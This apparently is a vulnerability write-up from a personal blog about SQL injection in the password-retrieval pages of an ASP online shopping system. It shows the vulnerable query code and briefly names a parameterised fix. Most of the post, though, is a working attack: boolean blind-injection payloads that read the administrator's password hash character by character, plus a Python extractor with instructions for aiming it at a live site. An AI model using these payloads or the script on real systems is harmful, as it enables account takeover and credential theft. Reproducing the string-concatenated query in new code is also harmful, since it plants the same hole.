Cool Kid's blog
Affected version: Online Shopping System, fashion edition v3.2
Vulnerable files: getpwd2.asp, getpwd3.asp, getpwd4.asp
Vulnerability description: the password-retrieval pages take the variable username from the POST form and concatenate it straight into the SQL query without any filtering, so the query is SQL-injectable. Because the page's only visible reaction is "user found" or "user not found", it can be used as a boolean oracle to read the admin password hash one character at a time. The fix is to stop building the query from strings (use an ADODB.Command with parameters), or at the very least to escape the single quote in username before concatenating it.
Key code:
ASP code
<%
' username comes straight from the POST body and is never filtered
username = request.form("username")
Set rs = Server.CreateObject("ADODB.Recordset")
' the injection point: username is spliced into the quoted string literal
sql = "select * from [user] where username='" & username & "'"
rs.open sql, conn, 1, 1
If rs.eof Then
%>
<script language="javascript">
alert("This user is not registered. Please register!");
window.close();
</script>
<%
End If
%>
<html>
<meta http-equiv="Content-Language" content="zh-cn">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="images/css.css" rel="stylesheet" type="text/css">
<script language="javascript">
<!--
// Client-side check only: it stops an empty answer field but does nothing
// to the username value the server puts into the query.
function form1_onsubmit() {
  if (document.form1.answer.value == "") {
    alert("Enter your answer.");
    document.form1.answer.focus();
    return false;
  }
}
// -->
</script>
Usage:
POST the form data (I use the "sword" SQL.htm post form from http://www.loveshell.net/blog/blogview.asp?LogID=70). The default administrator has adminid 4 and the password is stored as a 16-character lowercase MD5 hash. ASCII 48-57 are the digits 0-9 and ASCII 97-122 are the lowercase letters (an MD5 hex string only ever uses a-f, so 97-102 is enough in practice). Submit one of the following as the username, with N set to the character position (1 to 16), and read the hash off the page's yes/no answer:
SQL code
' or (select count(*) from admin where adminid=4 and asc(mid(password,N,1)) between 48 and 57)<>0 and ''='
' or (select count(*) from admin where adminid=4 and asc(mid(password,N,1)) between 97 and 122)<>0 and ''='
After substitution the WHERE clause reads username='' or (...)<>0 and ''='', which is true exactly when the subquery finds a row. If the condition is true the page goes on to the "retrieve password" step; if it is false the dialog "This user is not registered. Please register!" is shown. Narrow the range in each request (binary search) instead of testing every value, so each character costs only a handful of requests.
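The extraction loop the usage section describes, as an added example that is not part of the original post. The page itself is not reachable offline, so `vulnerable_page` is a constructed emulation of the rs.eof logic in getpwd2.asp: it recognises exactly the payload shape above and answers the way the real page would; the user list, the admin password and the choice of the middle 16 hex digits as the stored "16-character MD5" are all assumptions. `BlindExtractor` asks the two range questions from the post and then binary-searches inside the matching range, so a character costs at most seven requests rather than up to 36.

```python
"""Boolean-based blind SQL injection against the getpwd2.asp oracle (added example)."""
import hashlib
import re

# --- constructed stand-in for the vulnerable page ---------------------------
USERS = {"alice"}  # rows in [user] (sample data)
# admin.password for adminid=4: 16-character MD5 = middle 16 hex digits (assumption)
ADMIN_PASSWORD_MD5 = hashlib.md5(b"admin888").hexdigest()[8:24]

# The exact string the exploit builds. After splicing, the WHERE clause is
#   username='' or (select ...)<>0 and ''=''
# which is true iff the subquery count is non-zero.
PAYLOAD_RE = re.compile(
    r"^' or \(select count\(\*\) from admin where adminid=4 "
    r"and asc\(mid\(password,(\d+),1\)\) between (\d+) and (\d+)\)<>0 and ''='$"
)


def vulnerable_page(username: str) -> str:
    """Emulates getpwd2.asp: returns the text the browser would show."""
    if username in USERS:
        return "retrieve password"
    m = PAYLOAD_RE.match(username)
    if m:
        pos, lo, hi = (int(g) for g in m.groups())
        # Emulation assumption: a position past the end of the hash never matches.
        if 1 <= pos <= len(ADMIN_PASSWORD_MD5) and lo <= ord(ADMIN_PASSWORD_MD5[pos - 1]) <= hi:
            return "retrieve password"
    return "This user is not registered. Please register!"


# --- the attack -------------------------------------------------------------
DIGITS = (48, 57)   # '0'-'9', the first range from the post
LOWER = (97, 122)   # 'a'-'z', the second range from the post (hex only needs 97-102)


def payload(pos: int, lo: int, hi: int) -> str:
    """Username value asking: is character `pos` of admin.password in [lo, hi]?"""
    return ("' or (select count(*) from admin where adminid=4 "
            f"and asc(mid(password,{pos},1)) between {lo} and {hi})<>0 and ''='")


class BlindExtractor:
    """Recovers admin.password by asking the page yes/no questions."""

    def __init__(self, oracle):
        self.oracle = oracle  # callable(username) -> page text
        self.requests = 0

    def in_range(self, pos: int, lo: int, hi: int) -> bool:
        self.requests += 1
        return "retrieve password" in self.oracle(payload(pos, lo, hi))

    def recover_char(self, pos: int) -> str:
        # 1. which of the two ranges from the post holds this character?
        for lo, hi in (DIGITS, LOWER):
            if self.in_range(pos, lo, hi):
                break
        else:
            raise ValueError(f"position {pos}: not a digit or lowercase letter")
        # 2. binary search inside that contiguous range
        while lo < hi:
            mid = (lo + hi) // 2
            if self.in_range(pos, lo, mid):
                hi = mid
            else:
                lo = mid + 1
        return chr(lo)

    def recover(self, length: int = 16) -> str:
        """length=16 matches the 16-character hash the post says is stored."""
        return "".join(self.recover_char(p) for p in range(1, length + 1))


if __name__ == "__main__":
    ex = BlindExtractor(vulnerable_page)
    print(ex.recover(), "recovered in", ex.requests, "requests")
```

Against the real site, replace `vulnerable_page` with a function that POSTs the username to getpwd2.asp and returns the response body; the rest of the loop stays the same. The request counter is there because the only visible trace of this attack in the web logs is a burst of POSTs to the same page with a single-quote in the username, which is also what a detection rule for it should key on.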